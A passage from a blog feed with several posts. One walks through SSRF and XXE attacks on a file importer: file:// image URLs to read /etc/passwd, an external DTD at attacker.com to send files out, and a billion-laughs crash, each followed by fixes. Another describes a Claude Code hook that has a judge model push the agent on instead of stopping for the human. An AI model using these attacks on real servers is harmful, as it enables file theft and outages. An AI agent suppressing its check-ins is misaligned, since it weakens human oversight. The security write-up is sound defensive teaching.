writing and especially his photography. Not only that, he has fantastic taste in music. I’ve left many a comment on his site about 80s and 90s synthpop and industrial music. A Parenthetical Departure - Sylvia was one of the first sites I started reading when I started looking up info on Bear Blog. They are EXTREMELY talented and have an excellent knack for playing with design, and showing others how it works. One of my side projects is Burn Like A Flame , which is my local K-pop and fandom photography site. I actualy just started a project there that is more than slightly based on People and Blogs - The Fandom Story Project . I’m interviewing local fans to talk about what they love and what their feelings are on fandom culture now, and I’m accompanying that with a photoshoot with that person. It’s a way to introduce people to each other within the community. Two of my favorite YouTube channels that I have recently been watching are focused on fashion discussion and history - Bliss Foster and understitch, . If you like learning and listening to information on fashion, I highly recommend these creators. I know a TON of people have now seen K-Pop Demon Hunters (which I love, and the movie has a great message for not only kids, but adults). If you’ve seen this and are interested in getting into K-Pop, I suggest checking out my favorite group, ATEEZ. If you think that most K-Pop is all chirpy bubbly cutesy songs, let me suggest two by this group that aren’t what you’d expect: Guerrilla and Turbulence . I strongly suggesting watching without the translations, and then watching again with them. Their lyrics are the thing that really drew me into this group, and had me learning more about the deeper meaning behind a lot of K-Pop songs. And finally, THANK YOU to Manu for People and Blogs! I always find some really great new sites to check out after reading these interviews, and I am truly honored to be asked to join this list of great bloggers. It’s inspiring me to work harder on my blog and to post more often. Now that you're done reading the interview, go check the blog and subscribe to the RSS feed . If you're looking for more content, go read one of the previous 117 interviews . Make sure to also say thank you to Benny and the other 127 supporters for making this series possible.

0 views
Langur Monkey 1 weeks ago

Google *unkills* JPEG XL?

I’ve written about JPEG XL in the past. First, I noted Google’s move to kill the format in Chromium in favor of the homegrown and inferior AVIF. 1 2 Then, I had a deeper look at the format, and visually compared JPEG XL with AVIF on a handful of images. The latter post started with a quick support test: “If you are browsing this page around 2023, chances are that your browser supports AVIF but does not support JPEG XL.” Well, here we are at the end of 2025, and this very sentence still holds true. Unless you are one of the 17% of users using Safari 3 , or are adventurous enough to use a niche browser like Thorium or LibreWolf , chances are you see the AVIF banner in green and the JPEG XL image in black/red. The good news is, this will change soon. In a dramatic turn of events, the Chromium team has reversed its tag, and has decided to support the format in Blink (the engine behind Chrome/Chromium/Edge). Given Chrome’s position in the browser market share, I predict the format will become a de factor standard for images in the near future. I’ve been following JPEG XL since its experimental support in Blink. What started as a promising feature was quickly axed by the team in a bizarre and ridiculous manner. First, they asked the community for feedback on the format. Then, the community responded very positively. And I don’t only mean a couple of guys in their basement. Meta , Intel , Cloudinary , Adobe , , , Krita , and many more. After that came the infamous comment: [email protected] [email protected] #85 Oct 31, 2022 12:34AM Thank you everyone for your comments and feedback regarding JPEG XL. We will be removing the JPEG XL code and flag from Chromium for the following reasons: Yes, right, “ not enough interest from the entire ecosystem ”. Sure. Anyway, following this comment, a steady stream of messages pointed out how wrong that was, from all the organizations mentioned above and many more. People were noticing in blog posts, videos, and social media interactions. Strangely, the following few years have been pretty calm for JPEG XL. However, a few notable events did take place. First, the Firefox team showed interest in a JPEG XL Rust decoder , after describing their stance on the matter as “neutral”. They were concerned about the increased attack surface resulting from including the current 100K+ lines C++ reference decoder, even though most of those lines are testing code. In any case, they kind of requested a “memory-safe” decoder. This seems to have kick-started the Rust implementation, jxl-rs , from Google Research. To top it off, a couple of weeks ago, the PDF Association announced their intent to adopt JPEG XL as a preferred image format in their PDF specification. The CTO of the PDF Association, Peter Wyatt, expressed their desire to include JPEG XL as the preferred format for HDR content in PDF files. 4 All of this pressure exerted steadily over time made the Chromium team reconsider the format. They tried to kill it in favor of AVIF, but that hasn’t worked out. Rick Byers, on behalf of Chromium, made a comment in the Blink developers Google group about the team welcoming a performant and memory-safe JPEG XL decoder in Chromium. He stated that the change of stance was in light of the positive signs from the community we have exposed above (Safari support, Firefox updating their position, PDF, etc.). Quickly after that, the Chromium issue state was changed from to . This is great news for the format, and I believe it will give it the final push for mass adoption. The format is excellent for all kinds of purposes, and I’ll be adopting it pretty much instantly for this and the Gaia Sky website when support is shipped. Some of the features that make it superior to the competition are: For a full codec feature breakdown, see Battle of the Codecs . JPEG XL is the future of image formats. It checks all the right boxes, and it checks them well. Support in the overwhelmingly most popular browser engine is probably going to be a crucial stepping stone in the format’s path to stardom. I’m happy that the Chromium team reconsidered their inclusion, but I am sad that it took so long and so much pressure from the community to achieve it. https://aomediacodec.github.io/av1-avif/   ↩︎ https://jpegxl.info/resources/battle-of-codecs.html   ↩︎ https://radar.cloudflare.com/reports/browser-market-share-2025-q1   ↩︎ https://www.youtube.com/watch?v=DjUPSfirHek&t=2284s   ↩︎ https://youtu.be/qc2DvJpXh-A   ↩︎ Experimental flags and code should not remain indefinitely There is not enough interest from the entire ecosystem to continue experimenting with JPEG XL The new image format does not bring sufficient incremental benefits over existing formats to warrant enabling it by default By removing the flag and the code in M110, it reduces the maintenance burden and allows us to focus on improving existing formats in Chrome Lossless re-compression of JPEG images. This means you can re-compress your current JPEG library without losing information and benefit from a ~30% reduction in file size for free. This is a killer feature that no other format has. Support for wide gamut and HDR. Support for image sizes of up to 1,073,741,823x1,073,741,824. You won’t run out of image space anytime soon. AVIF is ridiculous in this aspect, capping at 8,193x4,320. WebP goes up to 16K 2 , while the original 1992 JPEG supports 64K 2 . Maximum of 32 bits per channel. No other format (except for the defunct JPEG 2000) offers this. Maximum of 4,099 channels. Most other formats support 4 or 5, with the exception of JPEG 2000, which supports 16,384. JXL is super resilient to generation loss. 5 JXL supports progressive decoding, which is essential for web delivery, IMO. WebP or HEIC have no such feature. Progressive decoding in AVIF was added a few years back. Support for animation. Support for alpha transparency. Depth map support. https://aomediacodec.github.io/av1-avif/   ↩︎ https://jpegxl.info/resources/battle-of-codecs.html   ↩︎ https://radar.cloudflare.com/reports/browser-market-share-2025-q1   ↩︎ https://www.youtube.com/watch?v=DjUPSfirHek&t=2284s   ↩︎ https://youtu.be/qc2DvJpXh-A   ↩︎

0 views
Hugo 1 weeks ago

Securing File Imports: Fixing SSRF and XXE Vulnerabilities

You know who loves new features in applications? Hackers. Every new feature is an additional opportunity, a potential new vulnerability. Last weekend I added the ability to migrate data to writizzy from WordPress (XML file), Ghost (JSON file), and Medium (ZIP archive). And on Monday I received this message: > Huge vuln on writizzy > > Hello, You have a major vulnerability on writizzy that you need to fix asap. Via the Medium import, I was able to download your /etc/passwd Basically, you absolutely need to validate the images from the Medium HTML! > > Your /etc/passwd as proof: > > Micka Since it's possible you might discover this kind of vulnerability, let me show you how to exploit SSRF and XXE vulnerabilities. ## The SSRF Vulnerability SSRF stands for "Server-Side Request Forgery" - an attack that allows access to vulnerable server resources. But how do you access these resources by triggering a data import with a ZIP archive? The import feature relies on an important principle: I try to download the images that are in the article to be migrated and import them to my own storage (Bunny in my case). For example, imagine I have this in a Medium page: ```html ``` I need to download the image, then re-upload it to Bunny. During the conversion to markdown, I'll then write this: ```markdown ![](https://cdn.bunny.net/blog/12132132/image.jpg) ``` So to do this, at some point I open a URL to the image: ```kotlin val imageBytes = try { val connection = URL(imageUrl).openConnection() connection.setRequestProperty("User-Agent", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36") connection.setRequestProperty("Referer", "https://medium.com/") connection.setRequestProperty("Accept", "image/avif,image/webp,*/*") connection.connectTimeout = 10000 connection.readTimeout = 10000 connection.getInputStream().use { it.readBytes() } } catch (e: Exception) { logger.warn("Failed to download image $imageUrl: ${e.message}") return imageUrl } ``` Then I upload the byte array to Bunny. Okay. But what happens if the user writes this: ```html ``` The previous code will try to read the file following the requested protocol - in this case, `file`. Then upload the file content to the CDN. Content that's now publicly accessible. And you can also access internal URLs to scan ports, get sensitive info, etc.: ```html ``` The vulnerability is quite serious. To fix it, there are several things to do. First, verify the protocol used: ```kotlin if (url.protocol !in listOf("http", "https")) { logger.warn("Unauthorized protocol: ${url.protocol} for URL: $imageUrl") return imageUrl } ``` Then, verify that we're not attacking private URLs: ```kotlin val host = url.host.lowercase() if (isPrivateOrLocalhost(host)) { logger.warn("Blocked private/localhost URL: $imageUrl") return imageUrl } ... private fun isPrivateOrLocalhost(host: String): Boolean { if (host in listOf("localhost", "127.0.0.1", "::1")) return true val address = try { java.net.InetAddress.getByName(host) } catch (_: Exception) { return true // When in doubt, block it } return address.isLoopbackAddress || address.isLinkLocalAddress || address.isSiteLocalAddress } ``` But here, I still have a risk. The user can write: ```html ``` And this could still be risky if the hacker requests a redirect from this URL to /etc/passwd. So we need to block redirect requests: ```kotlin val connection = url.openConnection() if (connection is java.net.HttpURLConnection) { connection.instanceFollowRedirects = false } connection.setRequestProperty("User-Agent", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36") connection.setRequestProperty("Referer", "https://medium.com/") connection.setRequestProperty("Accept", "image/avif,image/webp,*/*") connection.connectTimeout = 10000 connection.readTimeout = 10000 val responseCode = (connection as? java.net.HttpURLConnection)?.responseCode if (responseCode in listOf(301, 302, 303, 307, 308)) { logger.warn("Refused redirect for URL: $imageUrl (HTTP $responseCode)") return imageUrl } ``` Be very careful with user-controlled connection opening. Except it wasn't over. Second message from Micka: > You also have an XXE on the WordPress import! Sorry for the spam, I couldn't test to warn you at the same time as the other vuln, you need to fix this asap too :) ## The XXE Vulnerability XXE (XML External Entity) is a vulnerability that allows injecting external XML entities to: - Read local files (/etc/passwd, config files, SSH keys...) - Perform SSRF (requests to internal services) - Perform DoS (billion laughs attack) Micka modified the WordPress XML file to add an entity declaration: ```xml ]> ... &xxe; ``` This directive asks the XML parser to go read the content of a local file to use it later. It would also have been possible to send this file to a URL directly: ```xml %dtd; ]> ``` And on [http://attacker.com/evil.dtd](http://attacker.com/evil.dtd): ```xml "> %all; ``` Finally, to crash a server, the attacker could also have done this: ```xml ]> &lol9; 1 publish post ``` This requests the display of over 3 billion characters, crashing the server. There are variants, but you get the idea. We definitely don't want any of this. This time, we need to secure the XML parser by telling it not to look at external entities: ```kotlin val factory = DocumentBuilderFactory.newInstance() // Disable external entities (XXE protection) factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true) factory.setFeature("http://xml.org/sax/features/external-general-entities", false) factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false) factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false) factory.isXIncludeAware = false factory.isExpandEntityReferences = false ``` I hope you learned something. I certainly did, because even though I should have caught the SSRF vulnerability, honestly, I would never have seen the one with the XML parser. It's thanks to Micka that I discovered this type of attack. FYI, [Micka](https://mjeanroy.tech/) is a wonderful person I've worked with before at Malt and who works in security. You may have run into him at capture the flag events at Mixit. And he loves trying to find this kind of vulnerability.

0 views
Jason Scheirer 1 weeks ago

A Series of Vignettes From My Childhood and Early Career

A short set of anecdotes, apropos of nothing. When I was younger, I really liked programming! I loved the sense of accomplishment, I loved the problem solving, I loved sharing what I made with the people around me to both amuse and assist. One particularly wise adult (somewhere around 1996) took me aside and said, “You know, you’re lucky you enjoy programming, because you won’t be able to make a living on it in the future. Doing it for love over money is a good idea.” “Coding is over, with Object Oriented programming one person who is much smarter than any of us could hope to be will develop the library just once and we will all use it going forward, forever. Once a problem is solved it never needs solving again. “In 5 years there’s going to be a library of objects, like books on a bookshelf, and every software problem will be solved by business people just snapping the object libraries they need together like LEGOs. They won’t need you at all.” I thought about this advice, and how Software Engineering would be ending by the time I entered school. I realized I had not even thought about my education yet. I was in middle school. Programming was not it, though, I knew that. I’m here nearly 30 years later and software continues to pay my bills, despite everything. Open source exists, there are libraries I can use to piece things together to solve all the time. New problem sets not covered by the garden path come up all the time. Clicking the LEGOs together continues to be a hard task. Every time we fix it at one level of abstraction we operate one level higher and the world keeps turning. Whenever I’m threatened with a good time and someone proclaims “this is it for you” all that happens is my job becomes more annoying. Haven’t gotten the sweet release of extinction quite yet. Around 1993 or so was the advent of the “Multimedia Age.” Multimedia was the buzzword. Software has to be multimedia ready . Education had to teach children to be ready for the multimedia age . If your tool, however inappropriate as it was, did not have multimedia features, you were going to be left behind. You needed a video guide. You needed to be on CD-ROM. This is just the new normal. “Multimedia” just means “sound and video.” We had a high concept term for a very direct, low concept concept. And the multimedia boom fizzled out. It became boring. Nobody is impressed by a video on a website and nobody thinks less of a website that doesn’t use sound and video if it’s not appropriate. You pop a tag in your HTML and your job is done. The amazing thing became mundane. The dream of “multimedia” became commonplace and everyone just accepted it as normal. I’m not aware of any industries that collapsed dramatically due to multimedia. Nobody really reskilled. Video editing is still a pretty rare thing to find, and we don’t commonly have sound engineers working on the audio UX of software products. In 2000 a coworker took me aside and showed me his brand-new copy of IntelliJ IDE. “It’s over for us,” he said, “this thing makes it so programmers aren’t strictly necessary, like one person can operate this tool and they can lay the rest of us off.” I was pretty awestruck, he got some amazing autocomplete right in the IDE. Without having to have a separate JavaDocs window open to the side, and without having to manually open the page for the class he needed documentation on, it just was there inline. It gave him feedback before the compile cycle on a bunch of issues that you normally don’t see until build. That was a nice bit of preventative work and seemed to have the potential to keep a developer in flow longer. And then he showed me the killer feature “that’s going to get us all out of a job:” the refactoring tools. He then proceeded to show me the tools, easily moving around code to new files, renaming classes across the codebase, all kinds of manual things that would have taken a person a few days to do on their own. It was magical. After some thought I said, “that’s amazing, but does it write new logic too or does it just move code around?” He didn’t seem fazed by that, and doubled down on the insistence that these powerful tools were our doom. I made a distinction between “useful” code and “filler” code, but apparently what is valued is not the quality and nature of the code but its volume and presence. This tool definitely gave both volume and presence to the tiny human-written nuggets within. At my first job in High School I was working in an office in a suburban office park with programmers from many different local agencies. One guy I chatted up was a contractor: these people were highly regarded, somewhat feared specialists. The guy in question was working on a multi-year migration of some county health computer system from MUMPS to a more modern relational system. He showed me the main family of problems he was solving to show off how smart he was for solving them; they were largely rote problems of migrating table schemas and records in a pretty uniform way. But there were a lot of them, and he was working hard to meet his deadline! I thought about it, and seeking his approval and validation, set out to help him. To show what I could do. I wrote a Python script that could solve the 85% case (it was mostly string manipulation) and even put a little TkInter dialog around it so he could select the files he wanted to migrate visually. It ran great, but he looked a little afraid when I demonstrated it to him: “You didn’t show this to anyone else, did you?” “Nope.” “Oh thank God.” I take it he used my tool because he had a lot more free time to goof off for the remaining six months of his contract. I don’t think he told anyone else what he had either, but I’m guessing that he had a lot more MUMPS migration contracts lined up when he could finish them in a matter of days. At the same job, I was paid to maintain a series of government agency web sites. One of my main tasks was to keep a list of mental health providers up-to-date on an HTML page and upload it to the server. This process was pretty mechanical: take Excel sheet from inbox, open in Excel, copy Excel table to HTML table. Within a month I had a fully automated workflow: I lived in fear of being found out, and told no one that the thing I was getting paid to do was no longer being done by me. About 9 months later the department in question hired a full-time web developer for $45k/yr to bring their website in-house. I was costing them about $25/hr, probably skating under $2000/yr for my outsourced services. This was clearly not about money. And what I feared did not happen. When I no longer had that work to sustain me my managers just put me on something else. There’s always more work. In my last years of undergraduate education and my first couple of years out of college I worked on projects that did some sort of Natural Language Processing tasks. For these we required training data, and the more the better. On that, though, we had responsibilities. We had to make sure the data we had also came with some sort of license or implicit permission. You didn’t just steal a pile of PDFs or scoop up a person’s web site and put it in your training set. There were ethical constrains, and legal consequences. You acted above-board when training your AI models. There were times we’d train models on Wikipedia dumps. They were always comparatively amazing results when we trained on good, large data like that. Cogent. Interesting. Even a simple Markov chain on Wikipedia looked smart. When we wrote web crawlers, we wrote them to respect . We kept them on local domains. The field of the crawlers included our email address, and if an angry webmaster didn’t like the way we were crawling them we’d fix it. Getting crawled aggressively at once taxed servers and spammed logs so we’d space it out to hours or days. If their was missing or malformed and they still didn’t want us there, we’d block the site from crawling. We made sure we had explicit permission to collect data for our training corpora. The dot com boom was a crazy time. The internet has just become mainstream and there was a new gold rush. Money was there just for the taking, so many VC funded business plans were just “ traditional business X, but on the internet! ” and the money flowed . How it flowed. Most of these companies, however, didn’t really have a solid business model other than buying some servers and a domain name and “we’ll put this thing on the internet.” Out of this crash came green shoots: Web 2.0, which used the web natively, organically, gave a good web-native experience. Eventually the dream of the internet, the promise of the hype, was made manifest after a lot of people learned a lot of really unnecessary, really painful lessons. They spent less and put their things on the internet because they made sense on the internet of the present, not because the internet was the next big thing. The dream of the widespread, ubiquitous internet came true, and there were very few fatalities. Some businesses died, but it was more glacial than volcanic in time scale. When ubiquitous online services became commonplace it just felt mundane. It didn’t feel forced. It was the opposite of the dot com boom just five years later: the internet is here and we’re here to build a solid business within it in contrast with we should put this solid business on the internet somehow, because it’s coming . This is indeed a set of passive-aggressive jabs on the continuing assault on our senses by the LLM hype lobby. I used Windows Automation to watch my Outlook inbox When an email came in from the person who sent me the Excels it would download it Open the Excel file in excel using Windows Automation Export it to CSV from Excel (the automation did this, I simply watched a ghost remote control an Excel window that opened and closed itself) Run a Python script that would inject that CSV data as an HTML table into the file Run another Python script that would connect to the FTP server and upload the file. It would randomly pause and issue typos so it looked like the FTP session was being operated by a human at a keyboard so nobody thought anything on my plot.

0 views
Kix Panganiban 2 weeks ago

First make it fast, then make it smart

In the speed vs. intelligence spectrum, I've always figured the smarter AI models would outperform faster ones in all but the most niche cases. On paper and in benchmarks, that often holds true. But I've learned -- at least for me personally -- that faster models bring way more utility to the table. Man, I hate the word "agentic." I find it to be trendy and pretentious, but "AI-assisted coding" is a mouthful with too many syllables, so I'll begrudgingly stick with "agentic" coding for now. When it comes to agentic coding, the instinct is to pick a smart model that can make clever changes to your code. You know, the kind that thinks out loud, noodles on an idea for a bit, then writes code and stares at it for a bit. On the surface, that seems like the way to go -- but for me, it's often a productivity killer. I've got ADHD, and even on meds, my attention span is flaky at best. Waiting for a model to "think" while it performs a task makes me lose focus on what it's even doing. (This is also why I don't believe in running agents in parallel, or huge plan-think-execute loops like what Google Antigravity does). My brain wanders off, and by the time the model's done, I've got to context-switch back to review its work. Then I ask for changes, wait again, and repeat the cycle. It's slow, painfully boring, and doesn't even guarantee I'll get what I want. Those little dead-air moments are what ruin it for me. I took a break from agentic coding for a while and went back to writing code by hand. No waiting, no boredom, and I always got exactly what I needed (usually). But then I realized something -- not all coding tasks need deep thought. My buddy Alex likes to call them "leaf node edits": small, trivial changes that are more mechanical than cerebral. Think splitting functions, renaming stuff (when doesn't cut it), or writing HTML and Markdown. These are perfect to delegate to AI because failing at tasks like these are rarely consequential, and mistakes are easier to spot. I think the trick really here is to not rely on AI to think or make architectural or design decisions. Do the planning and heavy lifting yourself; just use the tool for fast, broad-sweeping autocomplete. It's less like hiring a programmer and more like extending your typing speed. I once wrote about how Dumb Cursor is the best Cursor and that Cursor peaked with its first Composer release (I don't know why they chose to name two distinctly different features the same, but who knows anything these days). I take it all back. Composer is back with a vengeance, and it's fast . Aggressively fine-tuned for parallel tool calling, it flies through making changes -- even if it's not that smart. It makes silly mistakes and sometimes spits out vibe-codey slop (think: too many inline comments, ignoring , or overusing where it's not needed) -- but because it's so dang quick , it's a joy to use. For those leaf node edits, speed beats smarts every time. I've also tinkered with other fast models like Gemini Flash. It's cheap and decently smart, but it's just too unreliable for me. Google's API endpoints randomly conk out, I've found that it struggles with tool calling, and it'll hallucinate if you stuff too much into its context (which it touts as obnoxiously large). I'm sure there are workarounds -- but I don't want to fuss with it. My goal with agentic coding is low-friction help, not a side project to debug the tool itself. Then there are superfast inference providers like Cerebras , Sambanova , and Groq . They let you run open-weight, smart models (think Qwen or Kimi) at lightning speed. If I weren't already using Cursor, I'd probably go back to Roo or Crush with these. I just don't want to be managing multiple providers, API keys, and strict rate limiting -- it feels like a hassle, kinda defeating the purpose of a fast model. At the end of the day, my brain craves tools that keep up with me, not ones that make me wait. Faster models might not be the smartest, but for leaf node edits and mechanical tasks, I find them to be much more palatable. I'd rather iterate quickly and fix small goofs than sit through a slow model's deep thoughts. Turns out, speed isn't just a feature for me -- it's a necessity.

0 views
Manuel Moreale 2 weeks ago

Alexandra Wolfe

This week on the People and Blogs series we have an interview with Alexandra Wolfe, whose blog can be found at wrywriter.ca . Tired of RSS? Read this in your browser or sign up for the newsletter . The People and Blogs series is supported by Piet Terheyden and the other 124 members of my "One a Month" club. If you enjoy P&B, consider becoming one for as little as 1 dollar a month. I’m a viviparous, mammalian, carbon-based biped — a veritable fossil from a bygone age sometimes referred to as the Good Old Days. Though, to be honest, that’s debatable to the nth degree. I was born in Germany to British parents and moved across the planet every 2-3 years, all of which seemed very natural to me at the time. Apart from studying for 3 degrees (I never finished any of them) I did several years in the military ostensibly as an air traffic controller. I then somehow stumbled from there into the print & publishing trade and made a comfortable living working on books and magazines. I even rubbed shoulders with a few names over the years, which in and of itself, was pleasantly entertaining. Being in the publishing trade allowed me to indulge in a number of my fav hobbies, including publishing a couple of scifi ezines over the years, run a Star Trek club, hang out at several scifi and comic cons, and meet the stars and writers of many of my fav scifi shows. I still have the photographic evidence to prove it. I didn’t so much as decide to blog as stumble into it, like many back in the days of LiveJournal and MySpace, we all just followed the crowd. It then seemed logical (at the time) to upgrade from a MySpace account to bumbling around with HTML creating a static website that was then quickly superseded by me creating an official ‘Blog’. At that point I was using the then new Wordpress software. It was, for me at least, revolutionary. Suddenly, everyone was blogging about everything. It’s at that point I think I bought my first domain name: wrywriter and used the dot com version till right up till a few years ago when I added the dot ca version and, sadly, let the dot com version lapse. Though now, I wish I had kept it. Now, I still have the name, but have moved away from Wordpress and blog ‘lightly’ using Bear Blog and Micro Blog to scribble and share my thoughts on. Clean, small, simple and more focused on the actual writing and less on the tweaking and tinkering. Both platforms suit my current needs. I’m not sure I have a process per se. I don’t plan posts, and don’t jot down ideas. I’m more of a pantster, I stare at the blinking cursor only when I feel like I have something to say. Whether that be some random thought I had over breakfast, a news item I want to respond to, or a response to someone else’s post. I don’t do research, or make drafts, or have endless notebooks full of ideas. Unless we’re talking about short stories or ideas for novels. Blogging, for me, is more about spontaneity. I would have to say that physical space can and probably does influence how anyone writes. And that we all have our own particular quirks and eccentricities when it comes to our writing environment. I like mine to be quiet, clean, and minimal. There are a few toys I have at hand I play with, but other than that, it’s me and the keyboard, and a large screen. You’re asking a dinosaur who somehow lived long enough to stumble into a Jetson’s future what my Tech Stack is? Excuse me while I consult someone smarter than I am about what a tech stake might look like. Oh, you mean where did I buy my domain name and that sort of thing? I want to say Porkbun because I just love saying Porkbun. But no such luck, I sourced my domains here, in Canada, with WHC.ca and, at one time I had hosting with them, that is, till they kept putting their prices up. I also got very disillusioned by Wordpress so moved full time to Bear Blog and Micro Blog. I use Bear for more long form rambling posts and post my daily thoughts over on m.b. which is more suited to sharing said drivel on social media. I find this a bit of an odd question, my experience is based on what I went through, that ‘living’ experience of places and spaces that no longer exist, so of course, in the here and now, it would all be different. I would probably start off with a simple blog on Bear or the Pika platform and skip the likes of Blogger and Wordpress altogether. The web might be obsessed with money, but I’d say most bloggers are not. I’m not interested in monetising my blog, nor am I interested in reading blogs that are focused on making money. I avoid them like the plague. If someone quietly, and respectfully asks me to support their writing, however, with a discrete ‘Buy Me A Coffee’ button, then I’m almost always happy to make a donation. There are so many great blogs about at the moment, but some of my current fav reads are: I would humbly suggest you ask David Johnson of Crossing The Threshold for an interview. David lives in Hawaii and always has some thoughtful posts to read on his blog. There are many things I’m always working on when it comes to writing projects. I do love to scribble. You can find more over on Alexandra Wolfe (alexandrawolfe.ca) and read my daily posts over on the Wry Writer (wrywriter.ca). For those of you out there who love reading fantasy, I stumbled upon a great series by Robert Jackson Bennet starting with, The Tainted Cup and followed by A Drop Of Corruption. I sincerely hope there’s more in the series. Some fun websites people might like to check out: And finally, I would like to extend a big thank you to Robert Birming for suggesting me to join in this amazing series, People & Blogs, and an even bigger thank you to you, Manu, for asking me to take part. I feel honoured to be among such an esteemed alumni. Much love, Alex Now that you're done reading the interview, go check the blog and subscribe to the RSS feed . If you're looking for more content, go read one of the previous 116 interviews . Make sure to also say thank you to Chuck Grimmett and the other 124 supporters for making this series possible. David at www.crossingthethreshold.net Sylvia at sylvia.buzz David at forkingmad.blog Kimberly at kimberlykg.com Robert at robertbirming.com Annie at anniemueller.com My life in Weeks weeks.ginatrapani.org Notebook of Ghosts notebookofghosts.com Shady Characters shadycharacters.co.uk

0 views

Automating agentic development

This week, I visited my friends at 2389 in Chicago. These are the folks who took my journal plugin for Claude Code and ran with the idea, creating botboard.biz , a social media platform for your team's coding agents. They also put together an actual research paper proving that both tools improve coding outcomes and reduce costs. Harper is one of the folks behind 2389...and the person who first suggested to me that maybe I could do something about our coding agents' propensity for saying things like: His initial suggestion was that maybe I could make a single-key keyboard that just sends Back in May, I made one of those . When I added keyboard support to the Easy button, I made sure not to disable the speaker. So it helpfully exclaimed "That was easy!" every time it sent: But...you still had to press the button. I'm pretty sure the button got used for at least a day before it was...retired. But the problem it was designed to solve is very, very real. And pretty frustrating. Yesterday morning, sitting in 2389's offices, we spent a bunch of time talking about automating ourselves out of a job. In that spirit, I finally dug enough into Claude Code hooks to build out the first version of Double Shot Latte , a Claude Code plugin that, hopefully, makes a thing of the past. DSL is implemented as a Claude Code "Stop" hook. Any time Claude thinks it should stop and ask for human interaction, it first runs this hook. The hook hands off the last couple of messages to another instance of Claude with a prompt asking it to judge whether Claude genuinely needs the human's help or whether it's just craving attention. It tries to err on the side of pushing Claude to keep working. To try to avoid situations where it misjudges Claude's ability to keep working without guidance, it bails out if Claude tries to stop three times in five minutes. Testing DSL was...a little bit tricky. I needed to find situations where Claude would work for a bit and then stop and ask for my approval to keep working. Naturally, I asked Claude for test scenarios. The first was "build a full ecommerce platform." Claude cranked for about 20 minutes before stopping. I thought the judge agent hadn't worked, but...Claude had actually fulfilled the entire spec and built out an ecommerce platform. (The actual implementation was nothing to write home about, but I'm genuinely not sure what it could have done next without a little more direction. The second attempt fared no better. On Claude's advice, I asked another Claude to build out an HTML widget toolkit. Once again, it cranked for a while. It built widgets. It wrote tests. It wrote a Storybook. And when it stopped for the first time...I couldn't actually fault it. Slightly unsure how to test things, I put this all aside for a bit to work on another project. I opened up Claude Code and typed Claude greeted me like it normally does. And instead of stopping there like it usually would, it noticed that there were uncommitted files in my working directory and started to dig through each of them trying to reverse engineer the current project. Success! (I hit to stop it so that I could tell it what I actually wanted.) Double Shot Latte will absolutely burn more tokens than you're burning now. You might want to think twice about using it unsupervised. If you want to put Claude Code into turbo mode, DSL is available on the Superpowers marketplace . If you don't yet have the Superpowers marketplace set up, you'll need to do that before you can install Double Shot Latte: Once you do have the marketplace installed, run this command inside Claude Code: Then, restart Claude Code so it can pick up the new hook.

0 views
Simon Willison 2 weeks ago

How I automate my Substack newsletter with content from my blog

I sent out my weekly-ish Substack newsletter this morning and took the opportunity to record a YouTube video demonstrating my process and describing the different components that make it work. There's a lot of digital duct tape involved, taking the content from Django+Heroku+PostgreSQL to GitHub Actions to SQLite+Datasette+Fly.io to JavaScript+Observable and finally to Substack. The core process is the same as I described back in 2023 . I have an Observable notebook called blog-to-newsletter which fetches content from my blog's database, filters out anything that has been in the newsletter before, formats what's left as HTML and offers a big "Copy rich text newsletter to clipboard" button. I click that button, paste the result into the Substack editor, tweak a few things and hit send. The whole process usually takes just a few minutes. I make very minor edits: That's the whole process! The most important cell in the Observable notebook is this one: This uses the JavaScript function to pull data from my blog's Datasette instance, using a very complex SQL query that is composed elsewhere in the notebook. Here's a link to see and execute that query directly in Datasette. It's 143 lines of convoluted SQL that assembles most of the HTML for the newsletter using SQLite string concatenation! An illustrative snippet: My blog's URLs look like - this SQL constructs that three letter month abbreviation from the month number using a substring operation. This is a terrible way to assemble HTML, but I've stuck with it because it amuses me. The rest of the Observable notebook takes that data, filters out anything that links to content mentioned in the previous newsletters and composes it into a block of HTML that can be copied using that big button. Here's the recipe it uses to turn HTML into rich text content on a clipboard suitable for Substack. I can't remember how I figured this out but it's very effective: My blog itself is a Django application hosted on Heroku, with data stored in Heroku PostgreSQL. Here's the source code for that Django application . I use the Django admin as my CMS. Datasette provides a JSON API over a SQLite database... which means something needs to convert that PostgreSQL database into a SQLite database that Datasette can use. My system for doing that lives in the simonw/simonwillisonblog-backup GitHub repository. It uses GitHub Actions on a schedule that executes every two hours, fetching the latest data from PostgreSQL and converting that to SQLite. My db-to-sqlite tool is responsible for that conversion. I call it like this : That command uses Heroku credentials in an environment variable to fetch the database connection URL for my blog's PostgreSQL database (and fixes a small difference in the URL scheme). can then export that data and write it to a SQLite database file called . The options specify the tables that should be included in the export. The repository does more than just that conversion: it also exports the resulting data to JSON files that live in the repository, which gives me a commit history of changes I make to my content. This is a cheap way to get a revision history of my blog content without having to mess around with detailed history tracking inside the Django application itself. At the end of my GitHub Actions workflow is this code that publishes the resulting database to Datasette running on Fly.io using the datasette publish fly plugin: As you can see, there are a lot of moving parts! Surprisingly it all mostly just works - I rarely have to intervene in the process, and the cost of those different components is pleasantly low. You are only seeing the long-form articles from my blog. Subscribe to /atom/everything/ to get all of my posts, or take a look at my other subscription options . The core process is the same as I described back in 2023 . I have an Observable notebook called blog-to-newsletter which fetches content from my blog's database, filters out anything that has been in the newsletter before, formats what's left as HTML and offers a big "Copy rich text newsletter to clipboard" button. I click that button, paste the result into the Substack editor, tweak a few things and hit send. The whole process usually takes just a few minutes. I make very minor edits: I set the title and the subheading for the newsletter. This is often a direct copy of the title of the featured blog post. Substack turns YouTube URLs into embeds, which often isn't what I want - especially if I have a YouTube URL inside a code example. Blocks of preformatted text often have an extra blank line at the end, which I remove. Occasionally I'll make a content edit - removing a piece of content that doesn't fit the newsletter, or fixing a time reference like "yesterday" that doesn't make sense any more. I pick the featured image for the newsletter and add some tags.

0 views
iDiallo 3 weeks ago

How Do You Send an Email?

